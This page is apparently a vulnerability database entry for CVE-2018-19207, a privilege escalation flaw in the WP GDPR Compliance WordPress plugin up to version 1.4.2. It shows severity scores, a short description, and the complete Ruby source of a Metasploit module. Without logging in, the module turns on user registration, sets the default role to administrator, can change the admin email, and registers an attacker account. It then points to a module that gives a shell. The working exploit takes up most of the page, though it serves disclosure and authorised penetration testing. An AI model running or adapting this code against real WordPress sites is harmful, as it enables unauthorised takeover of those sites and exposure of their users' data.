Lucene search

Mikey Veenstra (WordFence), Thomas LabadieMSF:AUXILIARY-ADMIN-HTTP-WP_GDPR_COMPLIANCE_PRIVESC-

HistoryNov 29, 2018 - 1:08 a.m.

WordPress WP GDPR Compliance Plugin Privilege Escalation

2018-11-2901:08:01

Mikey Veenstra (WordFence), Thomas Labadie

www.rapid7.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.971

Percentile

99.8%

JSON

The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set wordpress administration options by overwriting values within the database. The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized users to trigger handlers and make configuration changes because of a failure to do capability checks when executing the ‘save_setting’ internal action. WARNING: The module sets Wordpress configuration options without reading their current values and restoring them later.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress WP GDPR Compliance Plugin Privilege Escalation',
        'Description' => %q{
          The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set
          wordpress administration options by overwriting values within the database.

          The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized
          users to trigger handlers and make configuration changes because of a failure to do
          capability checks when executing the 'save_setting' internal action.

          WARNING: The module sets Wordpress configuration options without reading their current
          values and restoring them later.
        },
        'Author' => [
          'Mikey Veenstra (WordFence)', # Vulnerability discovery
          'Thomas Labadie' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/'],
          ['CVE', '2018-19207'],
          ['WPVDB', '9144']
        ],
        'Notes' => {
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => [CONFIG_CHANGES]
        },
        'DisclosureDate' => '2018-11-08'
      )
    )

    register_options [
      OptString.new('EMAIL', [true, 'Email for registration', nil]),
      OptString.new('USER', [true, 'Username for registration', 'msfuser'])
    ]

    register_advanced_options [
      OptString.new('WPEMAIL', [false, 'Wordpress Administration Email (default: no email modification)', nil])
    ]
  end

  def check
    check_plugin_version_from_readme('wp-gdpr-compliance', '1.4.3')
  end

  def set_wp_option(name, value, ajax_security)
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => wordpress_url_admin_ajax,
      'vars_post' => {
        'action' => 'wpgdprc_process_action',
        'security' => ajax_security,
        'data' => "{\"type\":\"save_setting\",\"append\":false,\"option\":\"#{name}\",\"value\":\"#{value}\"}"
      }
    )

    res && res.code == 200
  end

  def run
    print_status('Getting security token from host...')
    wp_home_res = send_request_cgi(
      'method' => 'GET',
      'uri' => target_uri.path
    )

    unless wp_home_res && wp_home_res.code == 200
      fail_with(Failure::UnexpectedReply, "Unable to access Wordpress: #{target_uri.path}")
    end

    ajax_security = wp_home_res.body[/"ajaxSecurity":"([a-zA-Z0-9]+)"/i, 1]

    if datastore['WPEMAIL'].present? && (datastore['WPEMAIL'] =~ URI::MailTo::EMAIL_REGEXP)
      print_warning("Changing admin e-mail address to #{datastore['WPEMAIL']}...")
      unless set_wp_option('admin_email', datastore['WPEMAIL'], ajax_security)
        print_error('Failed to change the admin e-mail address')
        return
      end
    end

    print_warning('Enabling user registrations...')
    unless set_wp_option('users_can_register', '1', ajax_security)
      print_error('Failed to enable user registrations')
      return
    end

    print_warning('Setting the default user role type to administrator...')
    unless set_wp_option('default_role', 'administrator', ajax_security)
      print_error('Failed to set the default user role')
      return
    end

    print_status("Registering #{datastore['USER']} with email #{datastore['EMAIL']}")
    unless (datastore['EMAIL'] =~ URI::MailTo::EMAIL_REGEXP) && wordpress_register(datastore['USER'], datastore['EMAIL'])
      print_error('Failed to register user')
      return
    end

    vprint_good('For a shell: use exploits/unix/webapp/wp_admin_shell_upload')
  end
end